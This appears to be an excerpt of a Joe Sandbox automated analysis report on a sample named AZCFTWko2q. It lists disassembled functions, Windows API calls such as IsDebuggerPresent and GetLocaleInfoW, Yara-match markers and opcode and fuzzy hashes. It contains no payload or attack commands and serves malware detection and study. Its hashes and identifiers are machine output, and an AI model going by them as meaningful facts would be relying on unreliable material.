                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA6E
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA97
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,024FBCF4,?,00000000), ref: 024FBAAC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction ID: 288a1f027990ebf76b0392541bbb88d75f7ef192e0cdbe7723b3037dddc8a195
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C219532E00304AAE7749F54D901BA772A6EBCAE1CB56C066EA0AD7204F732DA81C350
                                                                                                                                                                                                                                                                                      Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                                                                      Function 024FBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024FBCB5
                                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 024FBD10
                                                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 024FBD1F
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,024F0A1C,00000040,?,024F0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024FBD67
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,024F0A9C,00000040), ref: 024FBD86
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                                      • Instruction ID: 7f37e6073a518e84179c4c1334e59d9c16c6f8ab6b38ff6aa6a1b7232299f209
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE519371900249ABEB51DFA5CC44ABF77B9EF9E708F04042FEA00E7290EB7196458B61
                                                                                                                                                                                                                                                                                      Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                                      • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                                                                      Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: C$C
                                                                                                                                                                                                                                                                                      • API String ID: 0-238425240
                                                                                                                                                                                                                                                                                      • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                                      • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                                                                      Function 024FB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024F0A23,?,?,?,?,024F047A,?,00000004), ref: 024FB353
                                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 024FB3E3
                                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 024FB3F1
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024F0A23,00000000,024F0B43), ref: 024FB494
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                                      • Instruction ID: edf2f6bc83b0d9fa1964e375e66873d598e0bd08c7bf10ffc40a8989b1ab2f83
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25610971600206AAD764AF35DC45BBB73ADEF8E718F14402FEB09D7680EB74D5408BA0
                                                                                                                                                                                                                                                                                      Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                                      • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                                                                                                                                                                                                      Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2834031935-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                                                                      • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                                                                                                                                                                                                      Function 024EA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,024CDAD7), ref: 024EA732
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024CDAD7), ref: 024EA73C
                                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024CDAD7), ref: 024EA749
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                                      • Instruction ID: 4649a0793cfd33ccb82e500e5141296872c2ac950f1a4b6450f9e6394cce389f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B31D4B490122C9BDB21DF64D98879DBBB8BF18711F5042EAE40CA7260EB309B858F45
                                                                                                                                                                                                                                                                                      Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                                      • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                                                      Function 024F00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00E7
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00EE
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 024F0100
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d41be2cb853779122c00ac3dc7a88bb26d3543edbedc78cf1a7c96cbfde6a7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01E0B635000548EFCF626F55DD08A5A7B6AEB86B46F104029FA058B636CB36DA42DE44
                                                                                                                                                                                                                                                                                      Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                                                                      Function 024C092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                      • Instruction ID: 3cf85c9df842f6fd3bc5ce3c7d3ca3eea59eed0ec6bfa2d80cc57b71e0b954be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A63137B6900609DFDB50CF99C880BAEBBF9FF48324F24504AD441A7310D771EA45CBA4
                                                                                                                                                                                                                                                                                      Function 024F8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                                      • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                                      • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                                      • Instruction ID: ad229483c852d6ee53efb4250a4e7a18463872af32814c639ad588bae306cc34
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A410876900219AEDB209FB9DC48EBB7779EFC4714F50466AFA05DB280E7319D41CB50
                                                                                                                                                                                                                                                                                      Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                                                                      • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                                      • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                                      • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
